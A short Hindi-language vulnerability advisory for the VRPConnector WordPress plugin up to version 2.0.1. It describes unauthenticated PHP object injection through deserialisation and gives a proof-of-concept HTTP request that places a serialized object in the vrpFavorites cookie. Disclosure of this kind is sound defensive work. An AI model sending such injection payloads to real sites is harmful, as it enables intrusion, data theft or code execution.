
VRPConnector <= 2.0.1 - अप्रमाणित PHP ऑब्जेक्ट इंजेक्शन
VRPConnector <= 2.0.1 - अप्रमाणित PHP ऑब्जेक्ट इंजेक्शन
VRPConnector वर्डप्रेस प्लगइन 2.0.1 संस्करण तक (और सहित) अविश्वसनीय इनपुट के डिसीरियलाइज़ेशन के माध्यम से PHP ऑब्जेक्ट इंजेक्शन के लिए संवेदनशील है। इससे अप्रमाणित हमलावरों के लिए एक PHP ऑब्जेक्ट इंजेक्ट करना संभव हो जाता है। संवेदनशील सॉफ़्टवेयर में कोई ज्ञात POP श्रृंखला मौजूद नहीं है। यदि लक्ष्य सिस्टम पर स्थापित किसी अतिरिक्त प्लगइन या थीम के माध्यम से कोई POP श्रृंखला मौजूद है, तो यह हमलावर को मनमानी फ़ाइलें हटाने, संवेदनशील डेटा प्राप्त करने या कोड निष्पादित करने की अनुमति दे सकता है।
GET / HTTP/1.1
Host: kubernetes.docker.internal:8929
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: vrpFavorites=O:20:"PHP_Object_Injection":0:{}
Upgrade-Insecure-Requests: 1
Priority: u=0, i